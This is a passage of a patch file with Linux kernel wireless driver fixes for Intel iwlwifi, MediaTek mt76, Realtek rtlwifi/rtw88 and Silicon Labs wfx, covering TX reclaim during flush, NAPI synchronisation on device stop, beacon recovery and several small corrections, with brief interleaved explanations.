+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-trans.h b/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
+index d659ccd065f78..70022cadee35b 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
+@@ -56,6 +56,10 @@
+  *	6) Eventually, the free function will be called.
+  */
+ 
++/* default preset 0 (start from bit 16) */
++#define IWL_FW_DBG_DOMAIN_POS	16
++#define IWL_FW_DBG_DOMAIN	BIT(IWL_FW_DBG_DOMAIN_POS)
++
+ #define IWL_TRANS_FW_DBG_DOMAIN(trans)	IWL_FW_INI_DOMAIN_ALWAYS_ON
+ 
+ #define FH_RSCSR_FRAME_SIZE_MSK		0x00003FFF	/* bits 0-13 */
+@@ -563,7 +567,7 @@ struct iwl_trans_ops {
+ 	int (*tx)(struct iwl_trans *trans, struct sk_buff *skb,
+ 		  struct iwl_device_tx_cmd *dev_cmd, int queue);
+ 	void (*reclaim)(struct iwl_trans *trans, int queue, int ssn,
+-			struct sk_buff_head *skbs);
++			struct sk_buff_head *skbs, bool is_flush);
+ 
+ 	void (*set_q_ptrs)(struct iwl_trans *trans, int queue, int ptr);
+ 
+@@ -1187,14 +1191,15 @@ static inline int iwl_trans_tx(struct iwl_trans *trans, struct sk_buff *skb,
+ }
+ 
+ static inline void iwl_trans_reclaim(struct iwl_trans *trans, int queue,
+-				     int ssn, struct sk_buff_head *skbs)
++				     int ssn, struct sk_buff_head *skbs,
++				     bool is_flush)
+ {
+ 	if (WARN_ON_ONCE(trans->state != IWL_TRANS_FW_ALIVE)) {
+ 		IWL_ERR(trans, "%s bad state = %d\n", __func__, trans->state);
+ 		return;
+ 	}
+ 
+-	trans->ops->reclaim(trans, queue, ssn, skbs);
++	trans->ops->reclaim(trans, queue, ssn, skbs, is_flush);
+ }
+ 
+ static inline void iwl_trans_set_q_ptrs(struct iwl_trans *trans, int queue,
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index 2d01f6226b7c6..618355ecd9d7b 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -1572,7 +1572,7 @@ static void iwl_mvm_rx_tx_cmd_single(struct iwl_mvm *mvm,
+ 	seq_ctl = le16_to_cpu(tx_resp->seq_ctl);
+ 
+ 	/* we can free until ssn % q.n_bd not inclusive */
+-	iwl_trans_reclaim(mvm->trans, txq_id, ssn, &skbs);
++	iwl_trans_reclaim(mvm->trans, txq_id, ssn, &skbs, false);
+ 
+ 	while (!skb_queue_empty(&skbs)) {
+ 		struct sk_buff *skb = __skb_dequeue(&skbs);
+@@ -1923,7 +1923,7 @@ static void iwl_mvm_tx_reclaim(struct iwl_mvm *mvm, int sta_id, int tid,
+ 	 * block-ack window (we assume that they've been successfully
+ 	 * transmitted ... if not, it's too late anyway).
+ 	 */
+-	iwl_trans_reclaim(mvm->trans, txq, index, &reclaimed_skbs);
++	iwl_trans_reclaim(mvm->trans, txq, index, &reclaimed_skbs, is_flush);
+ 
+ 	skb_queue_walk(&reclaimed_skbs, skb) {
+ 		struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb);
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/internal.h b/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
+index f7e4f868363df..69b95ad5993b0 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
+@@ -497,6 +497,7 @@ int iwl_pcie_rx_stop(struct iwl_trans *trans);
+ void iwl_pcie_rx_free(struct iwl_trans *trans);
+ void iwl_pcie_free_rbs_pool(struct iwl_trans *trans);
+ void iwl_pcie_rx_init_rxb_lists(struct iwl_rxq *rxq);
++void iwl_pcie_rx_napi_sync(struct iwl_trans *trans);
+ void iwl_pcie_rxq_alloc_rbs(struct iwl_trans *trans, gfp_t priority,
+ 			    struct iwl_rxq *rxq);
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+index b455e981faa1f..90a46faaaffdf 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
+ /*
+- * Copyright (C) 2003-2014, 2018-2022 Intel Corporation
++ * Copyright (C) 2003-2014, 2018-2023 Intel Corporation
+  * Copyright (C) 2013-2015 Intel Mobile Communications GmbH
+  * Copyright (C) 2016-2017 Intel Deutschland GmbH
+  */
+@@ -1053,6 +1053,22 @@ static int iwl_pcie_napi_poll_msix(struct napi_struct *napi, int budget)
+ 	return ret;
+ }
+ 
++void iwl_pcie_rx_napi_sync(struct iwl_trans *trans)
++{
++	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
++	int i;
++
++	if (unlikely(!trans_pcie->rxq))
++		return;
++
++	for (i = 0; i < trans->num_rx_queues; i++) {
++		struct iwl_rxq *rxq = &trans_pcie->rxq[i];
++
++		if (rxq && rxq->napi.poll)
++			napi_synchronize(&rxq->napi);
++	}
++}
++
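iwl_pcie_rx_napi_sync() gives the two stop paths below a way to wait out any RX NAPI poll that is already executing before the rings are torn down; together with iwl_pcie_synchronize_irqs() this closes the window where a poll could touch freed DMA memory. The guarantee comes from napi_synchronize(), sketched here with an invented wrapper:

	#include <linux/netdevice.h>

	/* Blocks until any in-flight poll on this NAPI instance has
	 * finished; must not be called from the poll routine itself.
	 * New polls can still be scheduled unless interrupts were
	 * quiesced first, hence the sync-IRQs-then-NAPI ordering.
	 */
	static void quiesce_rx(struct napi_struct *napi)
	{
		napi_synchronize(napi);
	}
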
+ static int _iwl_pcie_rx_init(struct iwl_trans *trans)
+ {
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans-gen2.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans-gen2.c
+index 94f40c4d24217..8b9e4b9c5a2e9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans-gen2.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans-gen2.c
+@@ -156,6 +156,8 @@ void _iwl_trans_pcie_gen2_stop_device(struct iwl_trans *trans)
+ 	if (test_and_clear_bit(STATUS_DEVICE_ENABLED, &trans->status)) {
+ 		IWL_DEBUG_INFO(trans,
+ 			       "DEVICE_ENABLED bit was set and is now cleared\n");
++		iwl_pcie_synchronize_irqs(trans);
++		iwl_pcie_rx_napi_sync(trans);
+ 		iwl_txq_gen2_tx_free(trans);
+ 		iwl_pcie_rx_stop(trans);
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 8e95225cdd605..39ab6526e6b85 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -1261,6 +1261,8 @@ static void _iwl_trans_pcie_stop_device(struct iwl_trans *trans)
+ 	if (test_and_clear_bit(STATUS_DEVICE_ENABLED, &trans->status)) {
+ 		IWL_DEBUG_INFO(trans,
+ 			       "DEVICE_ENABLED bit was set and is now cleared\n");
++		iwl_pcie_synchronize_irqs(trans);
++		iwl_pcie_rx_napi_sync(trans);
+ 		iwl_pcie_tx_stop(trans);
+ 		iwl_pcie_rx_stop(trans);
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/queue/tx.c b/drivers/net/wireless/intel/iwlwifi/queue/tx.c
+index 726185d6fab8b..8cf206837eeea 100644
+--- a/drivers/net/wireless/intel/iwlwifi/queue/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/queue/tx.c
+@@ -1551,7 +1551,7 @@ void iwl_txq_progress(struct iwl_txq *txq)
+ 
+ /* Frees buffers until index _not_ inclusive */
+ void iwl_txq_reclaim(struct iwl_trans *trans, int txq_id, int ssn,
+-		     struct sk_buff_head *skbs)
++		     struct sk_buff_head *skbs, bool is_flush)
+ {
+ 	struct iwl_txq *txq = trans->txqs.txq[txq_id];
+ 	int tfd_num = iwl_txq_get_cmd_index(txq, ssn);
+@@ -1622,9 +1622,11 @@ void iwl_txq_reclaim(struct iwl_trans *trans, int txq_id, int ssn,
+ 	if (iwl_txq_space(trans, txq) > txq->low_mark &&
+ 	    test_bit(txq_id, trans->txqs.queue_stopped)) {
+ 		struct sk_buff_head overflow_skbs;
++		struct sk_buff *skb;
+ 
+ 		__skb_queue_head_init(&overflow_skbs);
+-		skb_queue_splice_init(&txq->overflow_q, &overflow_skbs);
++		skb_queue_splice_init(&txq->overflow_q,
++				      is_flush ? skbs : &overflow_skbs);
+ 
+ 		/*
+ 		 * We are going to transmit from the overflow queue.
+@@ -1644,8 +1646,7 @@ void iwl_txq_reclaim(struct iwl_trans *trans, int txq_id, int ssn,
+ 		 */
+ 		spin_unlock_bh(&txq->lock);
+ 
+-		while (!skb_queue_empty(&overflow_skbs)) {
+-			struct sk_buff *skb = __skb_dequeue(&overflow_skbs);
++		while ((skb = __skb_dequeue(&overflow_skbs))) {
+ 			struct iwl_device_tx_cmd *dev_cmd_ptr;
+ 
+ 			dev_cmd_ptr = *(void **)((u8 *)skb->cb +
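With the is_flush flag threaded through, a reclaim that runs as part of a flush splices the overflow queue straight into the caller's skbs list, where the packets will be freed, instead of into the local list that gets retransmitted; re-queueing during a flush would only reintroduce the traffic being flushed. Reduced to its core (function and parameter names invented):

	#include <linux/skbuff.h>

	static void drain_overflow(struct sk_buff_head *overflow_q,
				   struct sk_buff_head *retransmit,
				   struct sk_buff_head *reclaimed,
				   bool is_flush)
	{
		/* Flush: hand packets back for freeing.
		 * Normal reclaim: keep them for retransmission.
		 */
		skb_queue_splice_init(overflow_q,
				      is_flush ? reclaimed : retransmit);
	}
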
+diff --git a/drivers/net/wireless/intel/iwlwifi/queue/tx.h b/drivers/net/wireless/intel/iwlwifi/queue/tx.h
+index eca53bfd326d1..ceb6812fe20b2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/queue/tx.h
++++ b/drivers/net/wireless/intel/iwlwifi/queue/tx.h
+@@ -173,7 +173,7 @@ void iwl_txq_gen1_update_byte_cnt_tbl(struct iwl_trans *trans,
+ 				      struct iwl_txq *txq, u16 byte_cnt,
+ 				      int num_tbs);
+ void iwl_txq_reclaim(struct iwl_trans *trans, int txq_id, int ssn,
+-		     struct sk_buff_head *skbs);
++		     struct sk_buff_head *skbs, bool is_flush);
+ void iwl_txq_set_q_ptrs(struct iwl_trans *trans, int txq_id, int ptr);
+ void iwl_trans_txq_freeze_timer(struct iwl_trans *trans, unsigned long txqs,
+ 				bool freeze);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/beacon.c b/drivers/net/wireless/mediatek/mt76/mt7603/beacon.c
+index b65b0a88c1ded..808466b7de472 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/beacon.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/beacon.c
+@@ -9,6 +9,23 @@ struct beacon_bc_data {
+ 	int count[MT7603_MAX_INTERFACES];
+ };
+ 
++static void
++mt7603_mac_stuck_beacon_recovery(struct mt7603_dev *dev)
++{
++	if (dev->beacon_check % 5 != 4)
++		return;
++
++	mt76_clear(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_TX_DMA_EN);
++	mt76_set(dev, MT_SCH_4, MT_SCH_4_RESET);
++	mt76_clear(dev, MT_SCH_4, MT_SCH_4_RESET);
++	mt76_set(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_TX_DMA_EN);
++
++	mt76_set(dev, MT_WF_CFG_OFF_WOCCR, MT_WF_CFG_OFF_WOCCR_TMAC_GC_DIS);
++	mt76_set(dev, MT_ARB_SCR, MT_ARB_SCR_TX_DISABLE);
++	mt76_clear(dev, MT_ARB_SCR, MT_ARB_SCR_TX_DISABLE);
++	mt76_clear(dev, MT_WF_CFG_OFF_WOCCR, MT_WF_CFG_OFF_WOCCR_TMAC_GC_DIS);
++}
++
+ static void
+ mt7603_update_beacon_iter(void *priv, u8 *mac, struct ieee80211_vif *vif)
+ {
+@@ -16,6 +33,8 @@ mt7603_update_beacon_iter(void *priv, u8 *mac, struct ieee80211_vif *vif)
+ 	struct mt76_dev *mdev = &dev->mt76;
+ 	struct mt7603_vif *mvif = (struct mt7603_vif *)vif->drv_priv;
+ 	struct sk_buff *skb = NULL;
++	u32 om_idx = mvif->idx;
++	u32 val;
+ 
+ 	if (!(mdev->beacon_mask & BIT(mvif->idx)))
+ 		return;
+@@ -24,20 +43,33 @@ mt7603_update_beacon_iter(void *priv, u8 *mac, struct ieee80211_vif *vif)
+ 	if (!skb)
+ 		return;
+ 
+-	mt76_tx_queue_skb(dev, dev->mphy.q_tx[MT_TXQ_BEACON],
+-			  MT_TXQ_BEACON, skb, &mvif->sta.wcid, NULL);
++	if (om_idx)
++		om_idx |= 0x10;
++	val = MT_DMA_FQCR0_BUSY | MT_DMA_FQCR0_MODE |
++		FIELD_PREP(MT_DMA_FQCR0_TARGET_BSS, om_idx) |
++		FIELD_PREP(MT_DMA_FQCR0_DEST_PORT_ID, 3) |
++		FIELD_PREP(MT_DMA_FQCR0_DEST_QUEUE_ID, 8);
+ 
+ 	spin_lock_bh(&dev->ps_lock);
+-	mt76_wr(dev, MT_DMA_FQCR0, MT_DMA_FQCR0_BUSY |
+-		FIELD_PREP(MT_DMA_FQCR0_TARGET_WCID, mvif->sta.wcid.idx) |
+-		FIELD_PREP(MT_DMA_FQCR0_TARGET_QID,
+-			   dev->mphy.q_tx[MT_TXQ_CAB]->hw_idx) |
+-		FIELD_PREP(MT_DMA_FQCR0_DEST_PORT_ID, 3) |
+-		FIELD_PREP(MT_DMA_FQCR0_DEST_QUEUE_ID, 8));
+ 
+-	if (!mt76_poll(dev, MT_DMA_FQCR0, MT_DMA_FQCR0_BUSY, 0, 5000))
++	mt76_wr(dev, MT_DMA_FQCR0, val |
++		FIELD_PREP(MT_DMA_FQCR0_TARGET_QID, MT_TX_HW_QUEUE_BCN));
++	if (!mt76_poll(dev, MT_DMA_FQCR0, MT_DMA_FQCR0_BUSY, 0, 5000)) {
+ 		dev->beacon_check = MT7603_WATCHDOG_TIMEOUT;
++		goto out;
++	}
++
++	mt76_wr(dev, MT_DMA_FQCR0, val |
++		FIELD_PREP(MT_DMA_FQCR0_TARGET_QID, MT_TX_HW_QUEUE_BMC));
++	if (!mt76_poll(dev, MT_DMA_FQCR0, MT_DMA_FQCR0_BUSY, 0, 5000)) {
++		dev->beacon_check = MT7603_WATCHDOG_TIMEOUT;
++		goto out;
++	}
+ 
++	mt76_tx_queue_skb(dev, dev->mphy.q_tx[MT_TXQ_BEACON],
++			  MT_TXQ_BEACON, skb, &mvif->sta.wcid, NULL);
++
++out:
+ 	spin_unlock_bh(&dev->ps_lock);
+ }
+ 
+@@ -81,6 +113,18 @@ void mt7603_pre_tbtt_tasklet(struct tasklet_struct *t)
+ 	data.dev = dev;
+ 	__skb_queue_head_init(&data.q);
+ 
++	/* Flush all previous CAB queue packets and beacons */
++	mt76_wr(dev, MT_WF_ARB_CAB_FLUSH, GENMASK(30, 16) | BIT(0));
++
++	mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[MT_TXQ_CAB], false);
++	mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[MT_TXQ_BEACON], false);
++
++	if (dev->mphy.q_tx[MT_TXQ_BEACON]->queued > 0)
++		dev->beacon_check++;
++	else
++		dev->beacon_check = 0;
++	mt7603_mac_stuck_beacon_recovery(dev);
++
+ 	q = dev->mphy.q_tx[MT_TXQ_BEACON];
+ 	spin_lock(&q->lock);
+ 	ieee80211_iterate_active_interfaces_atomic(mt76_hw(dev),
+@@ -89,14 +133,9 @@ void mt7603_pre_tbtt_tasklet(struct tasklet_struct *t)
+ 	mt76_queue_kick(dev, q);
+ 	spin_unlock(&q->lock);
+ 
+-	/* Flush all previous CAB queue packets */
+-	mt76_wr(dev, MT_WF_ARB_CAB_FLUSH, GENMASK(30, 16) | BIT(0));
+-
+-	mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[MT_TXQ_CAB], false);
+-
+ 	mt76_csa_check(mdev);
+ 	if (mdev->csa_complete)
+-		goto out;
++		return;
+ 
+ 	q = dev->mphy.q_tx[MT_TXQ_CAB];
+ 	do {
+@@ -108,7 +147,7 @@ void mt7603_pre_tbtt_tasklet(struct tasklet_struct *t)
+ 		 skb_queue_len(&data.q) < 8);
+ 
+ 	if (skb_queue_empty(&data.q))
+-		goto out;
++		return;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(data.tail); i++) {
+ 		if (!data.tail[i])
+@@ -136,11 +175,6 @@ void mt7603_pre_tbtt_tasklet(struct tasklet_struct *t)
+ 		MT_WF_ARB_CAB_START_BSSn(0) |
+ 		(MT_WF_ARB_CAB_START_BSS0n(1) *
+ 		 ((1 << (MT7603_MAX_INTERFACES - 1)) - 1)));
+-
+-out:
+-	mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[MT_TXQ_BEACON], false);
+-	if (dev->mphy.q_tx[MT_TXQ_BEACON]->queued > hweight8(mdev->beacon_mask))
+-		dev->beacon_check++;
+ }
+ 
+ void mt7603_beacon_set_timer(struct mt7603_dev *dev, int idx, int intval)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/core.c b/drivers/net/wireless/mediatek/mt76/mt7603/core.c
+index 60a996b63c0c0..915b8349146af 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/core.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/core.c
+@@ -42,11 +42,13 @@ irqreturn_t mt7603_irq_handler(int irq, void *dev_instance)
+ 	}
+ 
+ 	if (intr & MT_INT_RX_DONE(0)) {
++		dev->rx_pse_check = 0;
+ 		mt7603_irq_disable(dev, MT_INT_RX_DONE(0));
+ 		napi_schedule(&dev->mt76.napi[0]);
+ 	}
+ 
+ 	if (intr & MT_INT_RX_DONE(1)) {
++		dev->rx_pse_check = 0;
+ 		mt7603_irq_disable(dev, MT_INT_RX_DONE(1));
+ 		napi_schedule(&dev->mt76.napi[1]);
+ 	}
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+index 6cff346d57a78..2980e1234d13f 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+@@ -1430,15 +1430,6 @@ static void mt7603_mac_watchdog_reset(struct mt7603_dev *dev)
+ 
+ 	mt7603_beacon_set_timer(dev, -1, 0);
+ 
+-	if (dev->reset_cause[RESET_CAUSE_RESET_FAILED] ||
+-	    dev->cur_reset_cause == RESET_CAUSE_RX_PSE_BUSY ||
+-	    dev->cur_reset_cause == RESET_CAUSE_BEACON_STUCK ||
+-	    dev->cur_reset_cause == RESET_CAUSE_TX_HANG)
+-		mt7603_pse_reset(dev);
+-
+-	if (dev->reset_cause[RESET_CAUSE_RESET_FAILED])
+-		goto skip_dma_reset;
+-
+ 	mt7603_mac_stop(dev);
+ 
+ 	mt76_clear(dev, MT_WPDMA_GLO_CFG,
+@@ -1448,28 +1439,32 @@ static void mt7603_mac_watchdog_reset(struct mt7603_dev *dev)
+ 
+ 	mt7603_irq_disable(dev, mask);
+ 
+-	mt76_set(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_FORCE_TX_EOF);
+-
+ 	mt7603_pse_client_reset(dev);
+ 
+ 	mt76_queue_tx_cleanup(dev, dev->mt76.q_mcu[MT_MCUQ_WM], true);
+ 	for (i = 0; i < __MT_TXQ_MAX; i++)
+ 		mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[i], true);
+ 
++	mt7603_dma_sched_reset(dev);
++
++	mt76_tx_status_check(&dev->mt76, true);
++
+ 	mt76_for_each_q_rx(&dev->mt76, i) {
+ 		mt76_queue_rx_reset(dev, i);
+ 	}
+ 
+-	mt76_tx_status_check(&dev->mt76, true);
++	if (dev->reset_cause[RESET_CAUSE_RESET_FAILED] ||
++	    dev->cur_reset_cause == RESET_CAUSE_RX_PSE_BUSY)
++		mt7603_pse_reset(dev);
+ 
+-	mt7603_dma_sched_reset(dev);
++	if (!dev->reset_cause[RESET_CAUSE_RESET_FAILED]) {
++		mt7603_mac_dma_start(dev);
+ 
+-	mt7603_mac_dma_start(dev);
++		mt7603_irq_enable(dev, mask);
+ 
+-	mt7603_irq_enable(dev, mask);
++		clear_bit(MT76_RESET, &dev->mphy.state);
++	}
+ 
+-skip_dma_reset:
+-	clear_bit(MT76_RESET, &dev->mphy.state);
+ 	mutex_unlock(&dev->mt76.mutex);
+ 
+ 	mt76_worker_enable(&dev->mt76.tx_worker);
+@@ -1559,20 +1554,29 @@ static bool mt7603_rx_pse_busy(struct mt7603_dev *dev)
+ {
+ 	u32 addr, val;
+ 
+-	if (mt76_rr(dev, MT_MCU_DEBUG_RESET) & MT_MCU_DEBUG_RESET_QUEUES)
+-		return true;
+-
+ 	if (mt7603_rx_fifo_busy(dev))
+-		return false;
++		goto out;
+ 
+ 	addr = mt7603_reg_map(dev, MT_CLIENT_BASE_PHYS_ADDR + MT_CLIENT_STATUS);
+ 	mt76_wr(dev, addr, 3);
+ 	val = mt76_rr(dev, addr) >> 16;
+ 
+-	if (is_mt7628(dev) && (val & 0x4001) == 0x4001)
+-		return true;
++	if (!(val & BIT(0)))
++		return false;
+ 
+-	return (val & 0x8001) == 0x8001 || (val & 0xe001) == 0xe001;
++	if (is_mt7628(dev))
++		val &= 0xa000;
++	else
++		val &= 0x8000;
++	if (!val)
++		return false;
++
++out:
++	if (mt76_rr(dev, MT_INT_SOURCE_CSR) &
++	    (MT_INT_RX_DONE(0) | MT_INT_RX_DONE(1)))
++		return false;
++
++	return true;
+ }
+ 
+ static bool
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/regs.h b/drivers/net/wireless/mediatek/mt76/mt7603/regs.h
+index 3b901090b29c6..9b84db233aceb 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/regs.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/regs.h
+@@ -462,6 +462,11 @@ enum {
+ #define MT_WF_SEC_BASE			0x21a00
+ #define MT_WF_SEC(ofs)			(MT_WF_SEC_BASE + (ofs))
+ 
++#define MT_WF_CFG_OFF_BASE		0x21e00
++#define MT_WF_CFG_OFF(ofs)		(MT_WF_CFG_OFF_BASE + (ofs))
++#define MT_WF_CFG_OFF_WOCCR		MT_WF_CFG_OFF(0x004)
++#define MT_WF_CFG_OFF_WOCCR_TMAC_GC_DIS	BIT(4)
++
+ #define MT_SEC_SCR			MT_WF_SEC(0x004)
+ #define MT_SEC_SCR_MASK_ORDER		GENMASK(1, 0)
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+index bcfc30d669c20..b2ea539f697f7 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+@@ -988,13 +988,13 @@ mt7915_is_ebf_supported(struct mt7915_phy *phy, struct ieee80211_vif *vif,
+ 			struct ieee80211_sta *sta, bool bfee)
+ {
+ 	struct mt7915_vif *mvif = (struct mt7915_vif *)vif->drv_priv;
+-	int tx_ant = hweight8(phy->mt76->chainmask) - 1;
++	int sts = hweight16(phy->mt76->chainmask);
+ 
+ 	if (vif->type != NL80211_IFTYPE_STATION &&
+ 	    vif->type != NL80211_IFTYPE_AP)
+ 		return false;
+ 
+-	if (!bfee && tx_ant < 2)
++	if (!bfee && sts < 2)
+ 		return false;
+ 
+ 	if (sta->deflink.he_cap.has_he) {
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/dm.c b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/dm.c
+index 6f61d6a106272..5a34894a533be 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/dm.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/dm.c
+@@ -799,7 +799,7 @@ static void rtl88e_dm_check_edca_turbo(struct ieee80211_hw *hw)
+ 	}
+ 
+ 	if (rtlpriv->btcoexist.bt_edca_dl != 0) {
+-		edca_be_ul = rtlpriv->btcoexist.bt_edca_dl;
++		edca_be_dl = rtlpriv->btcoexist.bt_edca_dl;
+ 		bt_change_edca = true;
+ 	}
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/dm_common.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/dm_common.c
+index 0b6a15c2e5ccd..d92aad60edfe9 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/dm_common.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/dm_common.c
+@@ -640,7 +640,7 @@ static void rtl92c_dm_check_edca_turbo(struct ieee80211_hw *hw)
+ 	}
+ 
+ 	if (rtlpriv->btcoexist.bt_edca_dl != 0) {
+-		edca_be_ul = rtlpriv->btcoexist.bt_edca_dl;
++		edca_be_dl = rtlpriv->btcoexist.bt_edca_dl;
+ 		bt_change_edca = true;
+ 	}
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/dm.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/dm.c
+index 8ada31380efa4..0ff8e355c23a4 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/dm.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/dm.c
+@@ -466,7 +466,7 @@ static void rtl8723e_dm_check_edca_turbo(struct ieee80211_hw *hw)
+ 	}
+ 
+ 	if (rtlpriv->btcoexist.bt_edca_dl != 0) {
+-		edca_be_ul = rtlpriv->btcoexist.bt_edca_dl;
++		edca_be_dl = rtlpriv->btcoexist.bt_edca_dl;
+ 		bt_change_edca = true;
+ 	}
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/debug.c b/drivers/net/wireless/realtek/rtw88/debug.c
+index 9ebe544e51d0d..abd750c3c28e5 100644
+--- a/drivers/net/wireless/realtek/rtw88/debug.c
++++ b/drivers/net/wireless/realtek/rtw88/debug.c
+@@ -1191,9 +1191,9 @@ static struct rtw_debugfs_priv rtw_debug_priv_dm_cap = {
+ #define rtw_debugfs_add_core(name, mode, fopname, parent)		\
+ 	do {								\
+ 		rtw_debug_priv_ ##name.rtwdev = rtwdev;			\
+-		if (!debugfs_create_file(#name, mode,			\
++		if (IS_ERR(debugfs_create_file(#name, mode,		\
+ 					 parent, &rtw_debug_priv_ ##name,\
+-					 &file_ops_ ##fopname))		\
++					 &file_ops_ ##fopname)))	\
+ 			pr_debug("Unable to initialize debugfs:%s\n",	\
+ 			       #name);					\
+ 	} while (0)
+diff --git a/drivers/net/wireless/silabs/wfx/data_tx.c b/drivers/net/wireless/silabs/wfx/data_tx.c
+index 6a5e52a96d183..caa22226b01bc 100644
+--- a/drivers/net/wireless/silabs/wfx/data_tx.c
++++ b/drivers/net/wireless/silabs/wfx/data_tx.c
+@@ -226,53 +226,40 @@ static u8 wfx_tx_get_link_id(struct wfx_vif *wvif, struct ieee80211_sta *sta,
+ 
+ static void wfx_tx_fixup_rates(struct ieee80211_tx_rate *rates)
+ {
+-	int i;
+-	bool finished;
++	bool has_rate0 = false;
++	int i, j;
+ 
+-	/* Firmware is not able to mix rates with different flags */
+-	for (i = 0; i < IEEE80211_TX_MAX_RATES; i++) {
+-		if (rates[0].flags & IEEE80211_TX_RC_SHORT_GI)
+-			rates[i].flags |= IEEE80211_TX_RC_SHORT_GI;
+-		if (!(rates[0].flags & IEEE80211_TX_RC_SHORT_GI))
++	for (i = 1, j = 1; j < IEEE80211_TX_MAX_RATES; j++) {
++		if (rates[j].idx == -1)
++			break;
++		/* The device uses the rates in descending order, whatever the request from minstrel.
++		 * We have to trade off here. Most important is to respect the primary rate
++		 * requested by minstrel. So, we drop the entries with a rate higher than the
++		 * previous one.
++		 */
++		if (rates[j].idx >= rates[i - 1].idx) {
++			rates[i - 1].count += rates[j].count;
++			rates[i - 1].count = min_t(u16, 15, rates[i - 1].count);
++		} else {
++			memcpy(rates + i, rates + j, sizeof(rates[i]));
++			if (rates[i].idx == 0)
++				has_rate0 = true;
++			/* The device applies Short GI only on the first rate */
+ 			rates[i].flags &= ~IEEE80211_TX_RC_SHORT_GI;
+-		if (!(rates[0].flags & IEEE80211_TX_RC_USE_RTS_CTS))
+-			rates[i].flags &= ~IEEE80211_TX_RC_USE_RTS_CTS;
+-	}
+-
+-	/* Sort rates and remove duplicates */
+-	do {
+-		finished = true;
+-		for (i = 0; i < IEEE80211_TX_MAX_RATES - 1; i++) {
+-			if (rates[i + 1].idx == rates[i].idx &&
+-			    rates[i].idx != -1) {
+-				rates[i].count += rates[i + 1].count;
+-				if (rates[i].count > 15)
+-					rates[i].count = 15;
+-				rates[i + 1].idx = -1;
+-				rates[i + 1].count = 0;
+-
+-				finished = false;
+-			}
+-			if (rates[i + 1].idx > rates[i].idx) {
+-				swap(rates[i + 1], rates[i]);
+-				finished = false;
+-			}
++			i++;
+ 		}
+-	} while (!finished);
++	}
+ 	/* Ensure that MCS0 or 1Mbps is present at the end of the retry list */
